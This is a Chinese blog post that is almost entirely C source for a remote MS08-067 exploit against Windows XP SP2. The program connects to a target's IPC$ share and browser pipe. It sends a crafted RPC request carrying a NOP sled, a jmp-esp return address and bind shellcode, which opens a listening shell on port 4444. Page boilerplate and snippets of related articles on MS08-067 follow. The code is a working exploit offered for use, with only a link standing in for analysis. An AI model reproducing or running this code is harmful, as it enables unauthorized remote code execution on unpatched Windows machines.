MS08-067

最新推荐文章于 2024-05-01 09:17:42 发布
最新推荐文章于 2024-05-01 09:17:42 发布
阅读量996 收藏
点赞数
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leng_que/article/details/38469309
版权 
// MS08-067 Exploit 冷却整理
//
// [Microsoft Visual C++ .NET] 编译通过
// [WindowsXP SP2 简体中文纯净版] 测试通过,但成功率并不是100%

// 漏洞分析参见 http://blog.csdn.net/iiprogram/article/details/3156229

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <Rpc.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "Rpcrt4.lib")
#pragma comment(lib, "mpr.lib")

struct RPCBIND
{
	BYTE  VerMaj;
	BYTE  VerMin;
	BYTE  PacketType;
	BYTE  PacketFlags;
	DWORD DataRep;
	WORD  FragLength;
	WORD  AuthLength;
	DWORD CallID;
	WORD  MaxXmitFrag;
	WORD  MaxRecvFrag;
	DWORD AssocGroup;
	BYTE  NumCtxItems;
	WORD  ContextID;
	WORD  NumTransItems;
	GUID  InterfaceUUID;
	WORD  InterfaceVerMaj;
	WORD  InterfaceVerMin;
	GUID  TransferSyntax;
	DWORD SyntaxVer;
};

/*
struct RPCFUNC
{
	BYTE  VerMaj;
	BYTE  VerMin;
	BYTE  PacketType;
	BYTE  PacketFlags;
	DWORD DataRep;
	WORD  FragLength;
	WORD  AuthLength;
	DWORD CallID;
	DWORD AllocHint;
	WORD  ContextID;
	WORD  Opnum;
};
*/

BYTE PRPC[0x48] = 
{
	0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
	0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
	0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
	0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
	0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};

BYTE POP[] = //stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"

"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // 74
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"

"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";

unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";

BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"

"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"

"\x41\x41"

"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"

"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"

"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"

"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";

int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
	BYTE rbuf[256] = "";
	DWORD dw = 0;

	struct RPCBIND RPCBind;

	memcpy(&RPCBind, &PRPC, sizeof(RPCBind));

	UuidFromString((unsigned char *)Interface, &RPCBind.InterfaceUUID);

	RPCBind.InterfaceVerMaj = atoi(&InterfaceVer[0]);
	RPCBind.InterfaceVerMin = atoi(&InterfaceVer[2]);

	TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);

	return 0;
}

void usage(char* argv[])
{
	printf("=============================================\n");
	printf("\tMS08-067 远程溢出Exploit\n\n");
	printf("  溢出成功后侦听端口:4444\n");
	printf("  使用方法:%s {IP}\n", argv[0]);
	printf("=============================================\n");
}

int main(int argc, char* argv[])
{
	char* server = NULL;
	char unc[MAX_PATH];
	char szPipe[MAX_PATH];

	WSADATA wsa;
	NETRESOURCE nr;
	HANDLE hFile;

	BYTE rbuf[256] = "";
	DWORD dw = 0;

	if ( argc != 2 )
	{
		usage(argv);
		return -1;
	}

	server = argv[1];

	if ( WSAStartup(MAKEWORD(2,2), &wsa) != 0 )
	{
		printf("初始化Socket出错\n");
		return -1;
	}

	_snprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server);
	nr.dwType = RESOURCETYPE_ANY;
	nr.lpLocalName = NULL;
	nr.lpRemoteName = unc;
	nr.lpProvider = NULL;

	printf("连接 %s ipc$ ...", server);
	if ( WNetAddConnection2(&nr, "", "", 0) != 0 )
	{
		printf("失败!\n");
		return -1;
	}
	else
	{
		printf("成功!\n");
	}

	_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", server);

	printf("打开 \\\\%s\\pipe\\browser ...", server);
	hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if ( hFile == (HANDLE)(-1) )
	{
		printf("失败!\n");
		return -1;
	}
	else
	{
		printf("成功!\n");
	}

	printf("Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n");
	BindRpcInterface(hFile, "4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0");

	PVOID ptr = (PVOID)&POP;
	memcpy((char*)ptr+74, bind_shellcode, sizeof(bind_shellcode)-1);

	printf("发送 shellcode ...\n");
	TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP)-1, rbuf, sizeof(rbuf), &dw, NULL);

	printf("发送 溢出块 ...\n");
	TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT)-1, rbuf, sizeof(rbuf), &dw, NULL);

	CloseHandle(hFile);

	return 0;
}

leng_que
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
Kali之MSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 7206
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kali㉿kali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
2024年最新MS08-067 漏洞利用与安全加固
2401_84302796的博客
05-01 472
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
Kail之MSF渗透测试--MS08-067
m0_57485346的博客
02-13 1429
MS08-067
MS08_067漏洞详解
m0_64593235的博客
04-17 970
MS08_067漏洞详解
Windows Server服务 RPC 缓冲区远程溢出漏洞ms08-067复现
qq_63539335的博客
06-27 804
渗透练习:Windows Server服务 RPC 缓冲区远程溢出漏洞(ms08-067)复现,nmap,msf模块利用
MS08-067源码分析
04-04
MS08-067源码分析:深入理解Windows系统漏洞》 MS08-067,全称为“Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability”,是微软在2008年发布的一个严重安全漏洞。这个漏洞影响...
ms08-067_check.rar_MS08-052_MS08067_MS08067 python_ms08-067_che
09-23
标题中的"ms08-067_check.rar_MS08-052_MS08067_MS08067 python_ms08-067_che"提及了几个关键术语,它们主要与微软安全更新和一个特定的漏洞检查工具相关。"ms08-067"指的是微软在2008年发布的一个关键安全更新,...
ms08-067溢出工具
05-20
【标题】"ms08-067溢出工具"涉及的是一个著名的Windows系统安全漏洞,该漏洞在2008年被发现并命名为MS08-067。这个漏洞主要存在于微软的Server Service服务中,允许远程攻击者通过精心构造的网络请求触发系统内存的...
2008-MS08-067.rar_ MS08067_Amazon_MS08067_MSB-MS08-067_溢出
09-14
ms08067漏洞远程溢出代码,已测试可用,最新版,在远程电脑上开4444端口,只是感觉shellcode略差,如能反连可避过防火墙,看看哪位牛人愿意修改一下
利用win系统ms08-067漏洞.docx
10-26
利用Win系统MS08-067漏洞 MS08-067漏洞是Windows操作系统中一个严重的漏洞,它允许攻击者在无需身份验证的情况下远程执行代码。该漏洞于2008年10月โดยMicrosoft发布了补丁,但直到现在仍然有很多系统没有打补丁...
MS08-067 漏洞复现报告
Williamanddog的博客
08-29 2381
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验 证即可利用此漏洞运行任意代码。漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。.
利用ms08-067漏洞入侵靶机(win xp2) 并利用meterpreter进行深入渗透
xxwn202302的博客
08-09 563
MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。此漏洞可能用于进行蠕虫攻击。
MS08-067漏洞复现(Kali+MSF)
JiangDong
06-07 559
MS08-067漏洞复现利用
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1479
ms08_067,ms10_046
ms08_067漏洞复现
m0_63711447的博客
09-11 1517
漏洞原理:MS08_067漏洞也是在445端口上被攻击者利用,MS17_010利用的是445端口上的网络共享和远程文件的服务,而这次的MS08_067利用的是在远程调用过程中,函数出现的逻辑性错误,从而造成缓冲区溢出。
MS08-067 漏洞利用与安全加固
theRavensea
03-15 2109
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。 Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时会调用 NetpwCanoni
E027-操作系统漏洞验证及加固-MS08_067漏洞利用与安全加固
轻舟已过万重山
10-13 807
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。原理MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。
ms08-067漏洞复现
最新发布
07-04
MS08-067是一个著名的Windows系统安全漏洞,也称为"远程代码执行漏洞(Remote Code Execution)",主要影响的是Microsoft Windows Server 2003 SP2及以后版本、Windows XP SP3以及Windows Vista和Windows Server ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值